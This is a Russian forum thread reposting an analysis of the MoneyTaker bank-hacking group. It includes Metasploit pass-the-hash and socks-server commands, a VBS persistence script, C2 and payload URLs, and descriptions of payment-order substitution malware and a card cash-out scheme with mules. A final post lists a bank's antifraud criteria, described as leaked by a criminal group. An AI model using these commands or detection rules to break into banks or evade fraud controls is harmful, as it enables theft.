                          По умолчанию Metasploit генерирует самоподписанные SSL сертификаты и указывает случайные значения в поля: Valid from, Valid till, Common name. И такие сертификаты тоже могут вызывать подозрения.
                          Группа MoneyTaker перед проведением атаки также генерирует самоподписанные SSL-сертификаты, но поля заполняет не случайным образом, а указывает названия узнаваемых брендов, чтобы снизить вероятность обнаружения.
                          Мы обнаружили использование следующих сертификатов:

                          Persistence server
                          Хакеры стараются оставаться как можно незаметнее и для этого они используют «бестелесные» программы, которые работают только в оперативной памяти и уничтожаются после перезагрузки.
                          Для закрепления в системе атакующие используют скрипты на PowerShell, VBS.
                          Скрипты дают ряд преимуществ:
                          • Вредоносные скрипты также тяжело обнаружить средствами антивирусной защиты. Написать сигнатуру на скрипт без ложно положительных срабатываний гораздо сложнее, чем на бинарный файл.
                          • Скрипты легко модифицировать, что облегчает труд атакующих.
                          • Легко обеспечить персистентность. Обычно такие скрипты сохраняются в реестре или вызываются при наступлении определенных событий через Windows Management Instrumentation (WMI), Group Policy Objects (GPOs), Scheduled task. Такие скрипты очень просты и обычно их основная задача, загрузить основную программу из внешнего или локального источника и запустить ее.
                          Задача Persistence сервера отдать вредоносный файл для запуска, если атакованный компьютер был перезагружен. Особенностью этой группы является использование отдельного сервера для этой роли. На него они размещают скрипт, который делает две проверки:
                          1. Поле User-agent равно WinHttp. Если не равно, то возвращает ошибку вебсервера 404. Если равно WinHttp, то переходит ко второй проверке.
                          2. IP-адрес, с которого осуществляется запрос находится в белом списке. Если да, то отдается вредоносный файл mencstager.exe! Если не находится, отдается rundll32.exe – легитимный файл ОС Windows.
                          Такая проверка осложняет жизнь для исследователей, которые не могут получить вредоносный файл из-за того, что они пытаются скачать его с IP-адреса, который не в белом списке.

                          ЗАКРЕПЛЕНИЕ В СИСТЕМЕ
                          В отличие от других групп, проводящих целенаправленные атаки, методы закрепления в системе у MoneyTaker довольно стандартные.
                          В инцидентах осенью 2016 года в России не удалось восстановить полную картину, поскольку после успешной атаки следы были грамотно уничтожены. Однако в одном из случаев мы выяснили, что атака на один из российских банков начиналась с проникновения на личный (домашний) компьютер администратора финансовой организации и уже через него был получен доступ в корпоративную сеть банка.
                          Одним из методов закрепления в системе было создание с помощью bat-скриптов сервисов, которые запускали VNC-сервер.
                          Содержимое файла at1.bat
                          “c:\Program Files\Cisco Systems\VPN Client\hostsec32.exe” -install “Host Security Server”
                          Содержимое файла at2.bat
                          “c:\Program Files\Cisco Systems\VPN Client\hostsec32.exe” -uninstall “host security server”
                          Вызов этих bat-скриптов производился из Windows Task Scheduler.
                          Set oWS = WScript.CreateObject(“WScript.Shell”)
                          sLinkFile = “C:\Users\<%username%>\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\taskhost.lnk”
                          Set oLink = oWS.CreateShortcut(sLinkFile)
                          oLink.TargetPath = “C:\Users\<%username%>\AppData\Local\
                          Temp\taskhost.exe”
                          ‘ oLink.Arguments = “”
                          ‘ oLink.Description = “Task Scheduler”
                          ‘ oLink.HotKey = “ALT+CTRL+F”
                          ‘ oLink.IconLocation = “C:\Users\<%username%>\AppData\Local\Temp\taskhost.exe, 2”
                          ‘ oLink.WindowStyle = “1”
                          ‘ oLink.WorkingDirectory = “C:\Users\<%username%>\AppData\Local\Temp”
                          oLink.Save
                          ПЕРЕМЕЩЕНИЕ В СЕТИ
                          После успешного заражения одного из компьютеров и первичного закрепления в системе атакующим необходимо начать исследование локальной сети, чтобы получить права администратора домена и в конечном итоге захватить полный контроль над сетью.
                          Их основным инструментом для проведения атаки является Metasploit и именно его они использовали, чтобы проводить сетевую разведку, поиск уязвимых приложений, эксплуатацию уязвимостей, повышение прав в системах, сбор информации и многие другие действия.
                          Получение прав администратора
                          Чтобы повысить права до локального администратора (или локального пользователя SYSTEM), атакующие использовали различные модули-эксплоитов из стандартного набора Metasploit, либо обхода технологии UAC. Это позволило им использовать утилиту Mimikatz, которая подгружалась в память через meterpreter и предоставляла возможность извлечения паролей в открытом виде.
                          Кроме стандартных модулей из набора Metasploit используются следующие инструменты для повышения привилегий.

                          Интерес представляет файл ASLRSideChannelAttack.exe. Он скомпилирован 23 октября 2016 на основе кодов с российской конференции ZeroNights 2016, который опубликован в открытом доступе https://github.com/IOActive/I-know-w...our-page-lives.
                          Кроме того, они активно искали пароли, сохраненные в групповых политиках Active Directory, используя уязвимость MS14-025 и соответствующий модуль Metasploit (post/windows/gather/credentials/gpp).
                          Получив файлы групповых политик, атакующий расшифровывал пароли, которые в них сохранены и использовал их на остальных рабочих станциях. В некоторых случаях пароли в банках, предоставляющие права локального администратора, были очень слабыми. Вот пример паролей доменного администратора, которые восстановили атакующие:

                          Используя модули Metasploit, предоставляющие функционал дампа локального файла хешей Windows SAM (hashdump или smart_hashdump) они получали хеш NTLM локального администратора, а также хеш NTLM и пароль в открытом виде от доменных пользователей.
                          Распространения по сети
                          Для получения списка компьютеров в Active Directory часто используют PowerShell скрипт с именем allpc.ps1, который скопирован из этого обсуждения в октябре 2015 года:
                          https://serverfault.com/questions/73...iple-ous-in-ad
                          Для распространения по сети использовался модуль выполнения команд через штатный механизм psexec, который применяется для легального администрирования систем.
                          Данный механизм создает локальную службу через SMB/RPC, затем разово исполняет и удаляет ее. В свойствах службы на старт указывается нужная команда. Злоумышленник использовал два метода распространения нагрузки – публиковал в сетевой папке исполняемые файлы, и заставлял компьютеры-жертвы их запускать, либо указывал напрямую в строке запуска службы шелл-код.
                          Для паролей, которые были получены в виде хеша NTLM и не были расшифрованы, использовался механизм Pass-the-hash, который позволяет применять хеш NTLM для аутентификации без знания пароля. Для этого использовались все те же штатные модули psexec в Metasploit без какой-либо модификации.
                          use auxiliary/admin/smb/psexec _ command
                          set COMMAND start \\\\10.1.5.35\\tmp\\msc7.exe
                          set RHOSTS 10.1.5.35
                          set SMBUser Administrator
                          set SMBPass aad3b435b51404eeaad3b435b51404ee:23cec95759ea5880
                          adf1794f475c23cd
                          set SMBDomain WORKGROUP
                          После получения доступа к новым системам процесс сбора парольной информации повторялся.
                          Удаленный доступ
                          До октября 2017 для удаленного доступа они использовали стандартные инструменты Metasploit, а также обычные средства удаленного доступа. На хостах, где запущен Meterpreter, они поднимают Socks сервер, который дает им возможность удаленно отправлять команды внутри локальной сети. Для создания Socks-соединения, в основном они используют порты 7080 и 1808:
                          use auxiliary/server/socks4a
                          show options
                          set SRVHOST _ c2serverIP _
                          set SRVPORT 7080
                          Кроме этого, они активно используют различные VNC-клиенты, как из стандартного набора Fileless VNC, обычный VNC, UltraVNC и TightVNC Portable версии х32 и х64.
                          В США для удаленного доступа они используют решение LogMeIn Hamachi. В одном из инцидентов для обеспечения постоянного удаленного доступа они получили доступ к межсетевому экрану и настроили на нем туннель до сервера управления. Также для создания зашифрованного соединения между скомпрометированным компьютером и сервером атакующего они поднимают SSH-туннель с помощью легитимной утилиты plink.

                          Продолжение следует ….

                          Во второй части
                          СЛЕЖЕНИЕ ЗА ПОЛЬЗОВАТЕЛЕМ
                          АТАКА НА АРМ КБР
                          ВОЗМОЖНЫЕ АТАКИ НА SWIFT
                          АТАКА НА КАРТОЧНЫЙ ПРОЦЕССИНГ
                          ИСПОЛЬЗОВАНИЕ БАНКОВСКИХ ТРОЯНОВ
                          ИСПОЛЬЗОВАНИЕ POS-ТРОЯНОВ
                          Телега - @trener_dm
                          Ссылка https://t.me/trener_dm

                          Комментарий


                          • #14
                            MoneyTaker
                            Полтора года ниже радаров
                            (Часть 2.)


                            СЛЕЖЕНИЕ ЗА ПОЛЬЗОВАТЕЛЕМ
                            Для проведения успешной атаки необходимо иметь возможность следить за работой реальных операторов с внутренними системами.
                            Группа MoneyTaker использует несколько инструментов для этих целей:
                            • Легитимный инструмент NirCmd
                            • Самописный скриншотер и кейлоггер NirCmd – это маленькая консольная утилита, по функционалу схожая с psexec. Она позволяет удаленно выполнять множество команд: записывать и удалять значения и ключи в реестре, записывать значения в файл INI, подключаться к сети VPN, перезапускать или выключать компьютер, изменить созданную / измененную дату файла, изменить настройки дисплея, выключить монитор и многое другое.
                            Но одной из важных для атакующих функций является создание снимков экрана. Например, выполнив команду: nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM _ dd _ yyyy$-~$currtime.HH _ mm _ ss$.png
                            будет создано 10 скриншотов с интервалом 60 секунд. Но для атакующих этого функционала недостаточно и поэтому они создали свой уникальный скриншотер и кейлоггер.

                            Эти программы предназначены для перехвата вводимых пользователем клавиш, снятия скриншотов рабочего стола и перехвата содержимого буфера обмена. Все эти данные могут быть накоплены и сохранены в файл во временном каталоге.
                            Dropper
                            Является NSIS-установщиком. После своего запуска он создает следующие файлы.
                            %Temp%\datepicker-ru _ RU.js
                            %Temp%\LEJ%2BPamplona%2BSanta.jpg
                            %Temp%\roknewsflash.css
                            %Temp%\fonts.css
                            %Temp%\addons.css
                            %Temp%\tracker.php
                            %Temp%\mJ8OS5lCf8xFQQiX4F1Ei.sNXbnF1xay
                            %Temp%\<rnd _ chars>.tmp\System.dll
                            Дроппер дважды выполняет запуск собственного файла дочерним процессом. Дешифрует буфер данных, хранящийся в инсталляторе в зашифрованном виде, и внедряет его в дочерний процесс (запущенный последним). Таким образом достигается запуск полезной нагрузки.
                            Keylogger/Screenshotter
                            • Приложение скомпилировано в среде Delphi и содержит на главной форме компоненты текстового поля ввода и 5 таймеров.
                            • Исходя из названий компонентов на португальском, можно предположить авторство программиста либо назначение кампании как португалоязычной (например, бразильской), либо код основан на исходниках португальской программы.

                            • Те или иные функции приложения выполняются при очередном срабатывании таймера (спустя интервал времени, который в этом таймере указан, как интервал работы таймера).
                            • Из названий таймеров видно, что один из них назван для активации сетевых функций (InternetTimer), другой для отправки данных (EnviarTimer), но на деле выполняют иные функции. Вместо активации сетевых функций таймер «InternetTimer» просто активирует другой таймер, а таймер «EnviarTimer» (переводится как «таймер отправки») предназначен для сбора скриншотов и выгрузки собранных данных в файл во временном каталоге. Это может говорить о том, что исходный код исследуемого файла изначально писался для одних целей (включая сетевую отправку данных), а далее был немного модифицирован.
                            • После старта приложение выполняет метод TForm1. FormCreate(), в котором загружает в адресное пространство необходимые системные динамические библиотеки и ищет в них адреса функций WinExec, GetAsyncKeyState, GetWindowTextA, GetForegroundWindow KeyloggerTimer. При срабатывании таймера выполняет перехват нажатых клавиш на клавиатуре. При этом может извлекать название приложений (заголовка окна), в которых клавиша была нажата, дата\время нажатия.
                            Ниже приведен пример записи лога кейлогера. Жирным выделены нажимаемые клавиши или заголовки окон, в которых эти клавиши вводились:

                            • Результаты перехвата кейлогер записывает в объект TForm1.Memo1, расположенный на главной форме приложения. Отсюда данные далее могут быть получены для дальнейшей записи в файл во временном каталоге.
                            • EnviaTimer. С помощью api-функции GetClipboardData() может перехватывать содержимое буфера обмена
                            • В код таймера внедрена функция антиэмуляции для обхода антивирусов и средств автоматического анализа семплов на основе вызова функции ValidateName(). Предположительно этот метод антиэмуляции был скопирован из публичного источника (форум https://****av.ru/showpost.php?p=109096&postcount=63) и внедрен с ошибкой, из-за которой функции снятия скриншотов и записи данных в файл (которые по коду расположены после проверки наэмуляцию) могут не исполняться.
                            • Делает скриншот рабочего стола, компрессирует в JPEG и кодирует в base64
                            • Создает файл с именем “%Temp%\perflog1.tmp”
                            • Сетевого взаимодействия для отправки собранных данных в исследуемом файле обнаружено не было

                            АТАКА НА АРМ КБР
                            В августе 2016 года члены группы успешно взломали один из банков в России, где использовали программу для автоматического перевода денег через систему межбанковских переводов Центрального банка России АРМ КБР.

                            Получив доступ внутри банка к серверу АРМ КБР они загрузили инструмент, который сами назвали MoneyTaker v5.0. Это модульная программа. Главный модуль программы находится в каталоге «c:\intel\logs\1\mt\bin» и имеет имя «main.exe» или «igfxserv.exe». Это программа без сетевых взаимодействий и ее должны запустить с указанием главного конфигурационного файла в качестве аргумента. Осуществляет инициализацию в соответствии с конфигурационным файлом, проверяет наличие модулей, указанных в конфигурационном файле и бэкапы определенных каталогов АРМ КБР. Далее, в описании поведения файлов, зависимого от определенного конфигурационного параметра будет указываться имя параметра. Пример конфигурационного файла приведен в приложении.

                            Главный модуль — «Main.exe» или «IGFXSERV.exe»
                            Главный модуль запускается с указанием главного конфигурационного файла «c:\intel\logs\1\mt\config\main-config.txt». Модуль логирует все действия в файл «Main-Logfile». После запуска осуществляется поиск модулей XML, ED и TXT, указанных в конфигурации как «XmlBin» «EdBin» и «TxtBin» соответственно. Также осуществляется поиск их конфигурационных файлов, параметры: «XmlCfg» «EdCfg» и «TxtCfg». Конфигурационных файлов модулей в виде отдельных файлов может и не быть, в этом случае их настройки хранятся в одном файле «main-config.txt».
                            Считываются параметры «Directory» «Backup» «Recursive» «Action» и при помощи WINAPI функции «ReadDirectoryChangesW()» начинается слежение за файлами, появляющимися в каталогах, указанных в «Directory»
                            При появления нового файла осуществляется запуск соответствующего модуля (ED для каталога «chk», XML для каталога «cli» и TXT для каталога «tmp») и его копирование в директорию, указанную как «Backup».



                            Модуль автоподмены – «XML.EXE»
                            Файл «xml.exe» запускается главным модулем с указанием нового файла в каталоге «%АРМ КБР%\exq\cli» и файла конфигурации. Модуль автоподмены ведет подробные логи и записывает их в файл, указанный в конфигурации как «Xml-Logfile». В каталог «%АРМ КБР%\exq\cli» помещаются электронные сообщения, сформированные АС КБР для дальнейшей обработки компонентом шлюза «Входной контроль». Именно в этот момент осуществляется проверка модулем автоподмены xml файла на валидность и определение, является ли файл
                            электронного сообщения платежным поручением (имеет тип «ED101»).
                            Для ED101 осуществляется поиск полей «Purpose», «Payer», «PersonalAcc», «Payee», «Name», «Bank BIC», «CorrespAcc», «KPP», «INN», «SUM», «AccDocNo». Затем происходит считывание файла с реквизитами злоумышленников – «Xml-Workfile». Там указаны следующие поля: «name», «id», «acc», «inn», «kpp», «bik», «corr», «purpose».
                            Если удалось получить все необходимые поля у платежного поручения и в «Xml-Workfile» есть реквизиты, то осуществляется модификация xml документа платежного поручения. Туда записываются реквизиты из файла злоумышленников. При этом значение суммы платежа не изменяется, а для каждой замены у злоумышленников свой счет. Счета, на которые уходят деньги, не повторяются.
                            Успешность модификации обуславливается тем, что в этот момент платежное поручение еще не подписано, а подписываться будет уже платежное поручение с реквизитами мошенников.
                            Для дальнейшей работы другого модуля – ED, модуль XML после каждой автоподмены сохраняет информацию в «Xml-Resultfile» в следующем формате:
                            #
                            Id=
                            OrigAcc=
                            OrigBic=
                            OrigCor=
                            Purpose=
                            HackAcc=
                            HackBic=
                            HackCor=
                            Sum=
                            PayerPersonalAcc=
                            #
                            Модуль сокрытия – ED.EXE
                            Файл «ed.exe» запускается главным модулем с указанием нового файла в каталоге «%АРМ КБР%\exq\chk» и файла конфигурации. После того как платежное поручение было модифицировано, подписано и отправлено, происходят следующие действия:
                            • Оно (поручение) поступает на логический контроль, где проверяется правильность составления ЭПС, устанавливается соответствие реквизитов нормативно — справочной информации.
                            • Осуществляется контроль на возможность оплаты в пределах суммы ликвидных средств на банковском счете.
                            • ЭПС принимается к исполнению и производится списание средств со счета плательщика и зачисление на счет получателя.
                            • По результатам исполнения в адрес составителя направляется электронное сообщение ED206 (подтверждение дебета).
                            • Оно расшифровывается, распаковывается, проходит проверку кода аутентификации и защитного кода и сохраняется в каталоге «%АРМ КБР%\exq\chk».
                            • Главный модуль запускает модуль сокрытия с указанием поступившего электронного сообщения.
                            Модуль ED проверяет, является ли поступившее электронное сообщение ED206 (подтверждение дебета после списания) или ED211 (свернутая выписка, направляется по итогам дня или рейса).
                            Для ED206 проверяется поле «CorrAcc», для ED211 проверяется поле «PayeePersonalAcc». Значения этих полей сравниваются со значениями «HackAcc» в рабочем файле модуля ED (это файл, в который сохраняет информацию о прошедших заменах модуль XML).
                            Если значения совпадают, то выполняется замена, обратная той, что делал модуль XML.
                            Таким образом, платежное поручение отправляется и принимается к исполнению с реквизитами злоумышленника, а ответы приходят, словно реквизиты были исходными.
                            Это дает злоумышленникам дополнительное время до обнаружения хищений.

                            Модуль сокрытия с временными файлами – TXT.EXE
                            Главный модуль имеет возможность также запускать и модуль TXT с указанием временного файла АРМ КБР, но сам модуль получить не удалось и его назначение неизвестно.
                            Все модули MoneyTaker не имеют отображаемой информации и ведут активное логирование своих действий в лог файлы. Также есть возможность тестового запуска, которая выполняется после установки на ЭВМ, содержащую АРМ КБР. Это необходимо злоумышленникам для контроля процесса работы программы. После этой атаки они не провели ни одной новой атаки на АРМ КБР с использованием этого инструмента.

                            В ноябре 2017 злоумышленники снова получили доступ еще в один банк России, подобрались к серверам и рабочим местам операторов АРМ КБР, но воспользоваться MoneyTaker они не смогли из-за того, что сервер находился в полностью изолированном сегменте.
                            После неудачной попытки похитить деньги через систему межбанковских переводов они переключили свой фокус на систему карточного процессинга.

                            ВОЗМОЖНЫЕ АТАКИ НА SWIFT
                            Исследуя инфраструктуру атакующих, мы обнаружили, что они всегда стараются похищать внутреннюю документацию по работе с банковскими системами: руководства администраторов, внутренние инструкции и регламенты, формы заявок на внесение изменений, журналы транзакций и т.п.

                            Мы не обнаружили свидетельств успешных атак этой группы на системы SWIFT, а также не обнаружили связей с уже известными инцидентами, например, в Гонконге, Украине, Турции.
                            Однако, вместе с упомянутыми документами они ищут и копируют документы, связанные с работой SWIFT, что может свидетельствовать о готовящихся атаках. Сейчас в их распоряжение попали следующие документы:
                            • Installation and Administration Guide, для SWIFT Alliance Access 7.0
                            • Security Guide, для SWIFT Alliance Access 7.0
                            • System Administrator Procedures, для FedLink компании Ocean Systems
                            • User Procedures Manual, для FedLink компании Ocean Systems
                            Последние два документа представляют интерес, поскольку описывают, как используя эту систему, делать переводы через SWIFT. Согласно информации на сайте компании FedLink, сейчас у них более 200 клиентов в США и Латинской Америке. Возможно, что именно банки Латинской Америки будут следующей целью этой группы.


                            АТАКА НА КАРТОЧНЫЙ ПРОЦЕССИНГ
                            Первая атака на карточный процессинг, которую мы связали с это группой, была проведена в мае 2016. Получив доступ в сеть банка, они скомпрометировали рабочее место операторов FirstData STAR network portal, внесли необходимые изменения и сняли деньги. В январе 2017 атака повторилась уже в другом банке.
                            Атаки на карточный процессинг позволяют атакующим проводить атаки более безопасно для мулов, занимающихся обналичиванием. Атакующие находятся в одной стране, атакуемый банк - в другой, а обналичивание происходит в третьей. Эта схема не только более безопасна, но и более дешевая, что привлекает многих атакующих.

                            В общем схема очень проста:
                            • После получения контроля над банковской сетью, атакующие проверяли, есть ли возможность подключаться к системе управления карточным процессингом.
                            • Легально открывали или покупали доступные на рынке карты банка, в который они получили доступ.
                            • Мулы с открытыми заранее картами уезжали в другую страну, где ждали начала операции.
                            • Атакующие, используя доступ к карточному процессингу, убирали или увеличивали лимиты на снятие наличных для карт, с которыми уехали мулы.
                            • Убирали овердрафт лимиты, что позволяло уходить в минус даже по дебетовым картам.
                            • Мулы, используя эти карты, снимали наличные в одном банкомате, потому переходили к другому и так далее.
                            Средний ущерб от одной такой атаки составлял 0.5 миллиона долларов.

                            Как и в случае с атаками на SWIFT они собирают внутренние документы из банков, чтобы лучше понимать, как работать с определенными системами.

                            ИСПОЛЬЗОВАНИЕ БАНКОВСКИХ ТРОЯНОВ
                            Исследуя сервер управления, используемый для целенаправленных атак на банки, мы обнаружили два связанных файла:



                            Файл c4c.exe использует в качестве сервера управления адрес hххp://82.146.54.5/api/cfg.ashx
                            В паблике этот экземпляр распространялся под видом документа fedwire _ 22127061503 _ output _ report.doc (2818a0c63d729cb1f2d223e15c762209), который скачивал с сервера hxxp://188.120.235.201/fce2857010e1.exe (369ad5f7bc9a555f3395059978c720bb)



                            ИСПОЛЬЗОВАНИЕ POS-ТРОЯНОВ

                            Исследуя сервер управления, используемый для целенаправленных атак на банки, мы обнаружили два связанных файла:



                            В ноябре 2016 года компания Proofpoint описала массовую рассылку фишинговых писем по компаниям Великобритании и США. Фишинговые письма содержали документ с макросом
                            либо ссылку на фишинговый ресурс. При открытии документа происходила загрузка файла по ссылке hxxp://info.docs-sharepoint[.]com/officeup[.]exe, который является банковским трояном Kronos.
                            В нашем же случае файл 203.exe скачивался по ссылке: hххp://profile.invoice-sharepoint.com/Emplid/officeup.exe, в случае открытия файла LHarv.xls (de05666412026c6d6c4740b79bc71dbd
                            6420c0c62ad59cbadcd7d506614bc87d)



                            Банковский троян Kronos, описанный Proofpoint, загружал две полезных нагрузки:
                            hxxp://networkupdate[.]online/kbps/upload/c1c06f7d[.]exe - Smoke Loader
                            hxxp://networkupdate[.]online/kbps/upload/1f80ff71[.]exe - Smoke Loader
                            hxxp://networkupdate[.]online/kbps/upload/a8b05325[.]exe — ScanPOS
                            ScanPOS — это уникальный троян для кассовых аппаратов с подключенным POS-ерминалом. ScanPOS — собирает информацию о процессах, пользователях и привилегиях. Но основной функцией является дамп оперативной памяти и поиск данных банковских карт. Если данные карт были обнаружены, они проверяются по Luhn алгоритму, а затем отправляются на сервер управления. Адрес C&C для ScanPOS был hxxp://invoicesharepoint[.]com/ gateway[.]php
                            Телега - @trener_dm
                            Ссылка https://t.me/trener_dm

                            Комментарий


                            • #15
                              Критерии срабатывания антифрод системы онлайн платежей банка.
                              Слито одной из групп. Банк и актуальность неизвестна
                              1. Проверка RSA Критерий срабатывает в том случае, когда проверка в RSA возвращает один из статусов, выбранных в параметрах критерия
                              2. Присутствие IP-адреса в черном списке Критерий срабатывает, если IP-адрес(а) отправителя платежа присутствует(ют) в справочнике "Черный список IP-адресов"
                              3. Присутствие MAC-адресa в черном списке Критерий срабатывает, если MAC-адрес отправителя присутствует в справочнике "Черный список МАС-адресов"
                              4. Появление платежа в пользу нового получателя для данного счета отправителя Критерий срабатывает при осуществлении платежа в пользу нового/нехарактерного получателя. Если за анализируемый период количество платежей в пользу новых получателей превышает максимально допустимое, то считается, что определить характерность поведения невозможно, и критерий не срабатывает. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
                              5. Присутствие банка получателя в черном списке Критерий срабатывает, если банк получателя платежа присутствует в справочнике "Черный список банков получателя"
                              6. Подозрительные фразы в назначении платежa Критерий срабатывает, если в назначении платежа присутствуют фразы, находящиеся в справочнике характерных для мошеннических действий фраз ("Справочник подозрительных фраз в назначении платежа")
                              7. Нарушение сквозной нумерации платежей организации Критерий срабатывает, если максимальная разница между номером текущего платежа и ближайшим к нему номером платежа за последние 2 дня превышает максимально допустимое отклонение. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей за анализируемый период меньше минимально необходимого.
                              8. Смена IP-адресов Критерий срабатывает, если за анализируемый период времени с данного IP-адреса платежей не отправлялось. При частой смене IP-адресов отправки (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены IP-адреса, найденных за анализируемый период, меньше минимально необходимого.
                              9. Смена диапазона IP-адресов Критерий срабатывает, если IP-адрес платежа не попадает в диапазон IP-адресов платежей за анализируемый период времени. При частой смене диапазона IP-адресов (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены диапазона IP-адресов, найденных за анализируемый период, меньше минимально необходимого.
                              10. Смена оборудования Критерий срабатывает, если за анализируемый период времени с данного MAC-адреса платежи не отправлялись. При частой смене MAC-адресов (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены MAC-адреса, найденных за анализируемый период, меньше минимально необходимого.
                              11. Появление платежа на карточный счет/счет физического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой карточный счет/счет физического лица за анализируемый период.
                              12. Появление платежа на сводный счет/счет заработной платы Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой сводный счет/счет заработной платы за анализируемый период.
                              13. Смена пароля Критерий срабатывает, если за анализируемый период клиент не менял пароль, а в день отправки платежа такая смена произошла, или же в том случае, если за анализируемый период смены пароля были, но платежи, отправленные в день смены пароля, были признаны мошенническими.
                              14. Появление платежа на счет получателя с суммой выше предельной Критерий срабатывает при поступлении платежа с суммой, превышающей максимальную сумму за анализируемый период времени с учетом допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
                              15. Появление ошибочных платежей Критерий срабатывает, если за анализируемый период времени ошибочных платежей либо не было вообще, либо последний платеж, по которому данный критерий сработал, по результатам проверки оператором был признан мошенническим.
                              16. Снижение предельного остатка на счете Критерий срабатывает при снижении остатка на счете до величины значительно меньшей предельной величины остатка за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, необходимых для определения предельной величины остатка на счете, найденных за анализируемый период, меньше минимально необходимого.
                              17. Появление запросов выписки Критерий срабатывает, если за анализируемый период времени фактов появления ручного запроса выписки либо не было вообще, либо последний платеж, по которому данный критерий сработал, по результатам проверки оператором был признан мошенническим.
                              18. Смена типового времени получения платежа Критерий срабатывает при смене характерного для данного клиента времени получения платежа. Если время получения платежа меняется слишком часто (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, необходимых для определения типового времени получения платежа, найденных за анализируемый период, меньше минимально необходимого.
                              19. Подверженность клиента мошенническим атакам Критерий срабатывает, если за анализируемый период времени клиент подвергался мошенническим атакам в количестве, превышающем максимально допустимое.
                              20. Несколько неудачных попыток ввода пароля при входе в систему Критерий срабатывает при превышении максимально допустимого количества неудачных попыток ввода пароля при входе в систему с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество неудачных попыток ввода пароля, найденных за анализируемый период, меньше минимально необходимого.
                              21. Превышение суточной суммы платежей за период Критерий срабатывает при превышении суточной суммы платежей за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
                              22. Превышение суточного количества платежей за период Критерий срабатывает при превышении суточного количества платежей за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
                              23. Подозрительные ФИО получателя Критерий срабатывает, если ФИО получателя присутствует в справочнике "Cправочник подозрительных ФИО получателей".
                              24. Появление платежа на счет получателя с суммой выше средней Критерий срабатывает при поступлении платежа с суммой, превышающей среднюю сумму за анализируемый период времени с учетом допустимого отклонения.
                              25. Отправка срочного платежа Критерий срабатывает, если платеж является срочным
                              26. Появление платежа на депозитный счет физического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой депозитный счет физического лица за анализируемый период.
                              27. Слишком малое время между формированием платежа и его отправкой Критерий срабатывает, если время между формированием платежа и его отправкой меньше минимально допустимого значения, указываемого в настройках критерия.
                              28. Отправка платежа с незащищенного рабочего места Критерий срабатывает, если хотя бы один из включенных в настройках критерия параметров вернет значение FALSE.
                              29. Отправка платежа клиентом с низким уровнем защиты Критерий срабатывает, если из ДБО приходит флаг использования SafeTouch, равный FALSE.
                              30. Появление платежа с уже имеющимся номером Критерий срабатывает, если поступает платеж, номер которого уже встречался в ранее отправленном платеже за анализируемый период.
                              31. Отправка платежа из другой страны Критерий срабатывает, если страна, из которой отправлен платеж, не совпадает с указанной в настройках
                              32. Быстрая смена региона отправки платежа Критерий срабатывает, если регион, из которого отправлен проверяемый платеж не совпадает с регионом, из которого отправлен предыдущий платеж, и при этом время между этими платежами меньше указанного в настройках
                              33. Присутствие ФИО получателя в базе утерянных паспортов Критерий срабатывает, если количество найденных записей с ФИО получателя больше 0 и не превышает максимально допустимого значения, указываемого в настройках. Во всех остальных случаях критерий не срабатывает.
                              34. Присутствие ФИО руководителя компании в базе утерянных паспортов Критерий срабатывает, если ФИО руководителя присутствует в базе утерянных паспортов. Во всех остальных случаях критерий не срабатывает.
                              35. Превышение допустимого количества решений арбитражного суда Критерий срабатывает, если для компании получателя платежа количество найденных судебных решений превышает допустимое значение. Во всех остальных случаях критерий не срабатывает.
                              36. Превышение допустимого количества компаний, зарегистрированных по указанному адресу Критерий срабатывает при превышении допустимого количества компаний, которые могут быть зарегистрированы на юридический адрес получателя. В противном случае критерий не срабатывает.
                              37. Учредитель компании получателя платежа является «массовым» учредителем Критерий срабатывает, если количество компаний, учрежденных руководителем компании получателя, превышает максимально допустимое.
                              38. Частая смена руководителя компании получателя платежа Критерий срабатывает, если смена руководителя компании получателя платежа происходит чаще, чем указано в настройках критерия.
                              39. Компания получатель платежа является новой Критерий срабатывает, если возраст компании (в днях) меньше заданного в настройках. В противном случае критерий не срабатывает.
                              40. Компания получатель платежа является банкротом Критерий срабатывает, если получателем платежа является компания-банкрот, в противном случае критерий не срабатывает.
                              41. Финансовое состояние компании получателя платежа является нестабильным Критерий срабатывает, если показатели ликвидности, рентабельности, деловой активности и финансовой устойчивости компании не соответствуют нормативным значениям. В противном случае критерий не срабатывает.
                              42. Присутствие получателя в общем черном списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Черный список получателей»;
                              43. Присутствие получателя в клиентском черном списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Справочник плательщиков» на вкладке «Черный список получателей»;
                              44. Платеж на счет физического лица Критерий срабатывает, если получателем платежа является физическое лицо;
                              45. Платеж на сводный счет Критерий срабатывает, если в поле счета получателя указан сводный счет Банка;
                              46. Платеж в другой Банк Критерий срабатывает, если БИК банка-получателя не совпадает ни с одним из БИКов подразделений банка – отправителя;
